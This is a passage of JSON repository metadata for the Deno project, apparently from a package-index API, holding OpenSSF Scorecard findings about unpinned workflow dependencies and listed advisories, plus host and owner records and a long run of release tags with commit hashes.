https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind"